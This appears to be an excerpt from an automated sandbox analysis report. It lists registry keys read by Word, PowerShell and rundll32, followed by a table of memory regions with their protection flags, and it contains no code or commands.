C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F4AF5
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F4AF5
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 326 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1DA0000
|
unkown
|
page readonly
|
||
2840000
|
unkown
|
page read and write
|
||
2B3F000
|
unkown
|
page read and write
|
||
3140000
|
unkown
|
page read and write
|
||
3085000
|
unkown
|
page read and write
|
||
3153000
|
unkown
|
page read and write
|
||
22A0000
|
heap private
|
page read and write
|
||
2035000
|
heap private
|
page read and write
|
||
2777000
|
unkown
|
page readonly
|
||
310000
|
unkown
|
page readonly
|
||
A0000
|
unkown
|
page readonly
|
||
6F0000
|
unkown
|
page readonly
|
||
36D1000
|
unkown
|
page read and write
|
||
1DAF000
|
unkown
|
page read and write
|
||
2E7000
|
heap default
|
page read and write
|
||
450000
|
heap default
|
page read and write
|
||
2B90000
|
unkown
|
page write copy
|
||
10000000
|
unkown image
|
page readonly
|
||
370000
|
heap private
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
2860000
|
unkown
|
page readonly
|
||
600000
|
unkown
|
page readonly
|
||
1E87000
|
unkown
|
page readonly
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
299C000
|
unkown
|
page read and write
|
||
2D1E000
|
unkown
|
page read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
2B00000
|
unkown
|
page readonly
|
||
3125000
|
unkown
|
page read and write
|
||
32E9000
|
unkown
|
page read and write
|
||
1B606000
|
unkown
|
page read and write
|
||
3192000
|
unkown
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
2D50000
|
unkown
|
page write copy
|
||
250000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
2E7000
|
heap default
|
page read and write
|
||
650000
|
unkown
|
page write copy
|
||
1C50000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
617000
|
heap default
|
page read and write
|
||
A0000
|
heap default
|
page read and write
|
||
64D000
|
heap default
|
page read and write
|
||
32F3000
|
unkown
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
270000
|
heap default
|
page read and write
|
||
280000
|
unkown
|
page execute and read and write
|
||
564000
|
heap private
|
page read and write
|
||
2D60000
|
heap private
|
page execute and read and write
|
||
CD0000
|
heap private
|
page read and write
|
||
773000
|
heap default
|
page read and write
|
||
520000
|
heap default
|
page read and write
|
||
20B0000
|
unkown
|
page readonly
|
||
2330000
|
heap private
|
page read and write
|
||
6F4000
|
heap default
|
page read and write
|
||
3B8000
|
heap private
|
page read and write
|
||
22E0000
|
unkown
|
page read and write
|
||
1CB000
|
unkown
|
page read and write
|
||
7FF00280000
|
unkown
|
page read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
231F000
|
stack
|
page read and write
|
||
21DD000
|
unkown
|
page read and write
|
||
1C85D000
|
unkown
|
page read and write
|
||
2340000
|
unkown
|
page readonly
|
||
1FE7000
|
unkown
|
page readonly
|
||
2DF0000
|
heap private
|
page read and write
|
||
2A90000
|
unkown
|
page read and write
|
||
733000
|
heap default
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
6D0000
|
unkown
|
page readonly
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
316F000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2D2A000
|
heap private
|
page execute and read and write
|
||
1FFD000
|
unkown
|
page read and write
|
||
3679000
|
unkown
|
page read and write
|
||
57E000
|
heap default
|
page read and write
|
||
1C86000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
36D4000
|
unkown
|
page read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page read and write
|
||
1BCAE000
|
unkown
|
page read and write
|
||
36E7000
|
unkown
|
page read and write
|
||
12B000
|
unkown
|
page read and write
|
||
12DCC000
|
unkown
|
page read and write
|
||
249E000
|
unkown
|
page read and write
|
||
3D0000
|
heap default
|
page read and write
|
||
26CD000
|
unkown
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
27BE000
|
stack
|
page read and write
|
||
43F000
|
unkown
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
28B000
|
unkown
|
page read and write
|
||
3E0000
|
unkown
|
page readonly
|
||
1F70000
|
unkown
|
page readonly
|
||
2C0000
|
heap private
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
21EE000
|
unkown
|
page read and write
|
||
9CE000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
650000
|
unkown
|
page readonly
|
||
